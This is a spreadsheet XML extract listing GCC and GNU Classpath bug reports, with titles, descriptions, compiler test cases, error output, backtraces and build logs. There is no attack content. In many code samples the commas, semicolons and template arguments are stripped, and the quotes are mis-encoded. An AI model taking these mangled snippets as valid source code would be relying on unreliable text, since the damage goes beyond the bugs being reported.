2.95.2</t>
  </si>
  <si>
    <t>GCC-80444</t>
  </si>
  <si>
    <t>-fcompare-debug failures with -fsanitize-coverage=trace-pc</t>
  </si>
  <si>
    <t>% cat system_keyring.i
void foo() {
   int a = 0
}
 % gcc --save-temps -fcompare-debug -O2 -fsanitize-coverage=trace-pc -c system_keyring.i
gcc: error: system_keyring.i: -fcompare-debug failure
 % diff -u system_keyring.gkd system_keyring.gk.gkd
--- system_keyring.gkd  2017-04-17 12:07:15.192708236 +0200
+++ system_keyring.gk.gkd       2017-04-17 12:07:15.216708050 +0200
@@ -97 +97 @@
 (note # 0 0 NOTE_INSN_PROLOGUE_END)
 (note # 0 0 NOTE_INSN_FUNCTION_BEG)
 (call_insn/j:TI # 0 0 2 (call (mem:QI (symbol_ref:DI (__sanitizer_cov_trace_pc) [flags 0x41]  ) [ __builtin___sanitizer_cov_trace_pc S1 A8])
-        (const_int 0 [0])) system_keyring.i:3# {*sibcall}
+        (const_int 0 [0])) system_keyring.i:2# {*sibcall}
      (expr_list:REG_CALL_DECL (symbol_ref:DI (__sanitizer_cov_trace_pc) [flags 0x41]  )
         (expr_list:REG_EH_REGION (const_int 0 [0])
             (nil)))</t>
  </si>
  <si>
    <t>GCC-55992</t>
  </si>
  <si>
    <t>constexpr static member function not recognised in templated using statement</t>
  </si>
  <si>
    <t>The compiler fails to resolve a static constexpr member function which is used in a templated using directive. For example the following valid code
---------------------------------------------------------------------------------
#include 
template
struct test
{
  static constexpr unsigned pole(unsigned P)
  { return P&gt;MaxP? MaxP:P }
  template
  using my_array = std::array    // causing error
  template
  void do_something(my_array const
}
---------------------------------------------------------------------------------
produces (when compiling via g++ -c -std=c++11 test.cc using gcc 4.7.1 or 4.7.2)
---------------------------------------------------------------------------------
test.cc:10:42: error: â€˜poleâ€™ was not declared in this scope
---------------------------------------------------------------------------------
The compiler can be made happy by explicitly resolving (test::pole in line 10) or by not using my_array (ie. without the do_something() member)</t>
  </si>
  <si>
    <t>wd11</t>
  </si>
  <si>
    <t>GCC-55890</t>
  </si>
  <si>
    <t>[4.7 Regression] calling a builtin func through a cast triggers an ICE</t>
  </si>
  <si>
    <t>$ cat test.i
extern void *memmove(void * void * long unsigned int)
typedef int (*_TEST_fun_) ()
static _TEST_fun_ i = (_TEST_fun_) memmove
main() { i() }
$ gcc-4.7.2 -O1 -c test.i
test.i: In function â€˜mainâ€™:
test.i:4:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-53176</t>
  </si>
  <si>
    <t>[4.8 Regression] gcc.dg/lower-subreg-1.c FAILs</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 187015:
http://gcc.gnu.org/ml/gcc-cvs/2012-05/msg00011.html
caused:
FAIL: gcc.dg/lower-subreg-1.c scan-rtl-dump subreg1 Splitting reg
FAIL: gcc.target/i386/movbe-2.c scan-assembler-times movbe[ \t] 4</t>
  </si>
  <si>
    <t>GCC-1979</t>
  </si>
  <si>
    <t>GCC-20010122 not compiled on alpha osf5.1</t>
  </si>
  <si>
    <t>./configure &gt; conf.log 2&gt;&amp;1
make &gt; make.log 2&gt;&amp;1
like #1793
Release:
GCC-20010122 (2.97)
Environment:
Compaq AlphaServer EV5.6 (21164A) Tru64 UNIX 5.1 bison-1.28 user root</t>
  </si>
  <si>
    <t>GCC-1755</t>
  </si>
  <si>
    <t>libstdc++-v3 gen-num-limits fails on mips-sgi-irix5.3</t>
  </si>
  <si>
    <t>during 'make bootstrap-lean' after successfully bootstraping
the compiler configuration of libstdc++-v3 fails to compile
and link gen-num-limits.cc.  Here is how the compiler
is called:
/usr/src/gcc_objdir/gcc/g++ -B/usr/src/gcc_objdir/gcc/ -nostdinc++  -L/usr/src/g
cc_objdir/mips-sgi-irix5.3/libstdc++-v3/src -L/usr/src/gcc_objdir/mips-sgi-irix5
.3/libstdc++-v3/src/.libs -B/usr/local/gcc-2.97/mips-sgi-irix5.3/bin/ -B/usr/loc
al/gcc-2.97/mips-sgi-irix5.3/lib/ -isystem /usr/local/gcc-2.97/mips-sgi-irix5.3/
include  -I/usr/src/gcc_objdir/mips-sgi-irix5.3/libstdc++-v3/include     -o /usr
/src/gcc_objdir/mips-sgi-irix5.3/libstdc++-v3/src/gen-num-limits ../../../gcc/li
bstdc++-v3/src/gen-num-limits.cc      -nodefaultlibs -lgcc -lc
gen-num-limits.ii.bz2 attached.
Here are the error messages (lots of them):
ld: WARNING 84: /usr/src/gcc_objdir/gcc/libgcc.a is not used for resolving any symbol.
ld: ERROR 33: Unresolved data symbol predicate::is_signed  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss    -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss   -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_integer -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_exact -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::radix -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::min_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol value::max_exponent10 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss  -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559 -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_signed -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_infinity -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_quiet_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_signaling_nan -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::has_denorm_loss -- 1st referenced by gen-num-limits.o.
ld: ERROR 33: Unresolved data symbol predicate::is_iec559 -- 1st referenced by gen-num-limits.o.
Release:
gcc version 2.97 20010115 (experimental)
Environment:
IRIX miranda 5.3 11091811 IP20 mips
ld: INFO 61: Version 3.19.
binutils-2.9.1</t>
  </si>
  <si>
    <t>fleming.151</t>
  </si>
  <si>
    <t>GCC-50625</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression][OOP] ALLOCATABLE attribute lost for module CLASS variables</t>
  </si>
  <si>
    <t>The following program compiles with GCC 4.5 and ifort but fails with GCC 4.6 and GCC 4.7 with:
if(allocated(x)) stop
             1
Error: 'array' argument of 'allocated' intrinsic at (1) must be ALLOCATABLE
module m
type t
end type t
class(t) allocatable :: x
end module m
use m
implicit none
if(allocated(x)) stop
end</t>
  </si>
  <si>
    <t>GCC-65978</t>
  </si>
  <si>
    <t>missing constexpr on std::forward_as_tuple and std::tie (LWG issues 2275 and 2301)</t>
  </si>
  <si>
    <t>Neither libstdc++ 5.1.0 nor the trunk version implement LWG defect reports 2275 and 2301 that make std::tuple utilities std::forward_as_tuple and std::tie constexpr 
http://wg21.cmeerw.net/lwg/issue2275
http://wg21.cmeerw.net/lwg/issue2301
Both of these have been implemented in libc++ for a while now:
http://lists.cs.uiuc.edu/pipermail/cfe-commits/Week-of-Mon-20131007/090369.html
http://lists.cs.uiuc.edu/pipermail/cfe-commits/Week-of-Mon-20140224/099936.html
Since both resolutions only require C++11 style constexpr support they could also be backported to earlier versions in -std=c++1y mode.</t>
  </si>
  <si>
    <t>CLASSPATH-24114</t>
  </si>
  <si>
    <t>wrong background colors in JTextField and JTextArea</t>
  </si>
  <si>
    <t>Editable (active) JTextField's and JTextArea's should use a white
background in the default Metal theme.
At the moment (classpath cvs 2005.09.29) they show up with gray
background which is wrong (and results in very poor readability).
See attached screenshots for a comparison between JDK 1.4.2 and
classpath+jamvm 1.3.2.</t>
  </si>
  <si>
    <t>CLASSPATH-28580</t>
  </si>
  <si>
    <t>HTTP HEAD fails on chuncked encoding</t>
  </si>
  <si>
    <t>A HEAD request should never attempt to read any body data.  If chunked encoding or a content length are supplied reading of the body is attempted.</t>
  </si>
  <si>
    <t>GCC-59766</t>
  </si>
  <si>
    <t>c++1y: declaring friend function with 'auto' return type deduction is rejected with bogus reason</t>
  </si>
  <si>
    <t>Simple example showing the problem:
struct foo {
	friend auto test(const foo  }
}
g++ rejects this with:
test.cc:2:30: error: non-static data member declared â€˜autoâ€™
  friend auto test(const foo  }</t>
  </si>
  <si>
    <t>mizvekov</t>
  </si>
  <si>
    <t>GCC-70512</t>
  </si>
  <si>
    <t>[6 Regression] ICE on valid code on x86_64-linux-gnu: canonical types differ for identical types</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current GCC trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.  
This is a regression from 5.3.x.
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160401 (experimental) [trunk revision 234665] (GCC) 
$ 
$ g++-5.3 -c small.cpp
$ 
$ g++-trunk -c small.cpp
small.cpp: In member function â€˜S&amp; S::operator=(int)â€™:
small.cpp:5:13: internal compiler error: canonical types differ for identical types S* and S*
     return *this
             ^~~~
0x76ac7f comptypes(tree_node* tree_node* int)
	../../gcc-source-trunk/gcc/cp/typeck.c:1428
0x786c1e ocp_convert(tree_node* tree_node* int int int)
	../../gcc-source-trunk/gcc/cp/cvt.c:697
0x615753 convert_like_real
	../../gcc-source-trunk/gcc/cp/call.c:6695
0x62197b initialize_reference(tree_node* tree_node* int int)
	../../gcc-source-trunk/gcc/cp/call.c:9958
0x775bdb check_return_expr(tree_node* bool*)
	../../gcc-source-trunk/gcc/cp/typeck.c:8920
0x7b609e finish_return_stmt(tree_node*)
	../../gcc-source-trunk/gcc/cp/semantics.c:870
0x732aea cp_parser_jump_statement
	../../gcc-source-trunk/gcc/cp/parser.c:11808
0x732aea cp_parser_statement
	../../gcc-source-trunk/gcc/cp/parser.c:10414
0x73315c cp_parser_statement_seq_opt
	../../gcc-source-trunk/gcc/cp/parser.c:10806
0x73324f cp_parser_compound_statement
	../../gcc-source-trunk/gcc/cp/parser.c:10760
0x751a8f cp_parser_function_body
	../../gcc-source-trunk/gcc/cp/parser.c:20653
0x751a8f cp_parser_ctor_initializer_opt_and_function_body
	../../gcc-source-trunk/gcc/cp/parser.c:20689
0x752531 cp_parser_function_definition_after_declarator
	../../gcc-source-trunk/gcc/cp/parser.c:25351
0x757960 cp_parser_late_parsing_for_member
	../../gcc-source-trunk/gcc/cp/parser.c:26191
0x730039 cp_parser_class_specifier_1
	../../gcc-source-trunk/gcc/cp/parser.c:21524
0x730039 cp_parser_class_specifier
	../../gcc-source-trunk/gcc/cp/parser.c:21550
0x730039 cp_parser_type_specifier
	../../gcc-source-trunk/gcc/cp/parser.c:15834
0x749ea3 cp_parser_decl_specifier_seq
	../../gcc-source-trunk/gcc/cp/parser.c:12758
0x753296 cp_parser_simple_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12301
0x753721 cp_parser_block_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12248
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------------
struct S 
{
  S&amp; operator= (int)
  {
    return *this
  }
} __attribute__ ((__may_alias__))</t>
  </si>
  <si>
    <t>GCC-66264</t>
  </si>
  <si>
    <t>[untaken optimization] switch &amp; enums without default-case</t>
  </si>
  <si>
    <t>example:
https://goo.gl/UFYF6G
Even when the switch() contains all enums it won't use a lookuptable when no default-case is given.</t>
  </si>
  <si>
    <t>GCC-47677</t>
  </si>
  <si>
    <t>[4.6 Regression] Hang in VRP</t>
  </si>
  <si>
    <t>struct S { int s int u }
extern int bar (void)
extern struct S *baz (void)
void
foo (int x struct S *y char z int *v struct S *s)
{
  int c d
  if (x &amp; 2)
    d = 1
  else
    {
      d = (x 
      while ((c = (s-&gt;s != (s-&gt;u 
      c = (s-&gt;s != '\\' 
      if (c == '&lt;')
        goto lab
    }
  while ((c = ((s-&gt;u &amp; 1) ? s-&gt;s : bar ())) != 0
         &amp;&amp; ((d != 11 &amp;&amp; d != 17) || (v[c] &amp; 1) == 0))
    {
    lab:
      switch (d)
        {
        case 14:
          if (c == '}')
            y = baz ()
          d = y-&gt;s = z == '&lt;' ? 17 : 11
        }
    }
}
at -O2 hangs in VRP pass starting with
http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=163724
(at least I've killed it after 7 minutes).</t>
  </si>
  <si>
    <t>GCC-63248</t>
  </si>
  <si>
    <t>Crash when OpenMP target's array section handling is used with templates</t>
  </si>
  <si>
    <t>Consider:
    template 
    void f(T A T B)
    {
      extern int *v
      T a = 2
      T b = 4
    #pragma omp target map(to: v[a:b])
      v[a] = 0
    #pragma omp target map(to: v[A:B])
      v[a] = 0
    }
    void g()
    {
      f(1 5)
    }
GCC doesn't like that template usage:
    ../../openacc/T.C: In function 'void f(T T)':
    ../../openacc/T.C:8:35: internal compiler error: Segmentation fault
    0xc1833f crash_signal
	    ../../source/gcc/toplev.c:339
    0x697f0d tree_class_check
	    ../../source/gcc/tree.h:2851
    0x697f0d cp_omp_mappable_type(tree_node*)
	    ../../source/gcc/cp/decl2.c:1393
    0x764777 finish_omp_clauses(tree_node*)
	    ../../source/gcc/cp/semantics.c:5671
    0x6d3d39 cp_parser_omp_all_clauses
	    ../../source/gcc/cp/parser.c:28680
    0x6c6265 cp_parser_omp_target
	    ../../source/gcc/cp/parser.c:30649
    [...]
Discussion in .</t>
  </si>
  <si>
    <t>GCC-48536</t>
  </si>
  <si>
    <t>[C++0x] Automatic Enumerator Incrementation is not compliant with Clause 7.2/5</t>
  </si>
  <si>
    <t>The enumerations defined below are well-formed C++0x but g++ with C++0x extensions enabled still treats #1 as an overflow error.
Note: Comeau C/C++ 4.3.10.1 with C++0x extensions enabled reports no errors.
#include 
//
// g++ version 4.5.2 and below
//
// Compiler options:
//    -std=c++0x
//    -std=gnu++0x
// non-compliant error message:
//    error: overflow in enumeration values
//
// According to C++ draft N1905 (2005) and above / Clause 7.2/5
// The following enumeration is well-formed.
//
enum Enum_Inc  { EI_1=UINT_MAX EI_2 } // #1
// The above should be equivalent to the following
enum Enum_Inc2 { FI_1=UINT_MAX FI_2=FI_1+1 } // #2</t>
  </si>
  <si>
    <t>shaw.john.r</t>
  </si>
  <si>
    <t>GCC-5771</t>
  </si>
  <si>
    <t>Internal compiler error in schedule_insns</t>
  </si>
  <si>
    <t xml:space="preserve">Fetched source of gimp-1.3.3 ./configure make compiled 197 files OK.
in gimp-1.3.3/app/core:
gcc -v -save-temps -DHAVE_CONFIG_H -I. -I. -I../.. -I../.. -I../../app -I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include -I/usr/local/include/pango-1.0 -I/usr/X11R6/include -I/usr/include/freetype2 -I/usr/local/include/gtk-2.0 -I/usr/local/include/atk-1.0 -I/usr/local/lib/gtk-2.0/include -I/usr/local/include -DG_LOG_DOMAIN=\Gimp-Core\ -DG_DISABLE_DEPRECATED -DGDK_PIXBUF_DISABLE_DEPRECATED -DGDK_DISABLE_DEPRECATED -DGTK_DISABLE_DEPRECATED  -g -O2 -Wall -c gimpcontext.c
Reading specs from /usr/local/lib/gcc-lib/i586-pc-linux-gnu/3.1/specs
Configured with: ./configure 
Thread model: single
gcc version 3.1 20020211 (experimental)
GNU CPP version 3.1 20020211 (experimental) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i586-pc-linux-gnu/include
ignoring duplicate directory .
ignoring duplicate directory ../..
cpp0: warning: changing search order for system directory /usr/local/include
cpp0: warning:   as it has already been specified as a non-system directory
ignoring duplicate directory /usr/local/include
#include ... search starts here:
#include  search starts here:
 .
 ../..
 ../../app
 /usr/local/include/glib-2.0
 /usr/local/lib/glib-2.0/include
 /usr/local/include/pango-1.0
 /usr/X11R6/include
 /usr/include/freetype2
 /usr/local/include/gtk-2.0
 /usr/local/include/atk-1.0
 /usr/local/lib/gtk-2.0/include
 /usr/local/include
 /usr/local/lib/gcc-lib/i586-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
gimpcontext.c:1384:2: warning: #warning FIXME: EEKWrapper
 /usr/local/lib/gcc-lib/i586-pc-linux-gnu/3.1/cc1 -fpreprocessed gimpcontext.i -quiet -dumpbase gimpcontext.c -g -O2 -Wall -version -o gimpcontext.s
GNU CPP version 3.1 20020211 (experimental) (cpplib) (i386 Linux/ELF)
GNU C version 3.1 20020211 (experimental) (i586-pc-linux-gnu)
	compiled by GNU C version 2.95.3 20010315 (SuSE).
gimpcontext.c: In function `gimp_context_get_memsize':
gimpcontext.c:909: warning: implicit declaration of function `strlen'
gimpcontext.c: In function `gimp_context_new':
gimpcontext.c:1020: Internal compiler error in schedule_insns at sched-rgn.c:2974
Release:
3.1 20020211 (experimental)
Environment:
amd 400MHz suse linux 7.3 kernel 2.4.10
System: Linux h00a0cce2f131 2.4.10-4GB #1 Fri Sep 28 17:20:21 GMT 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
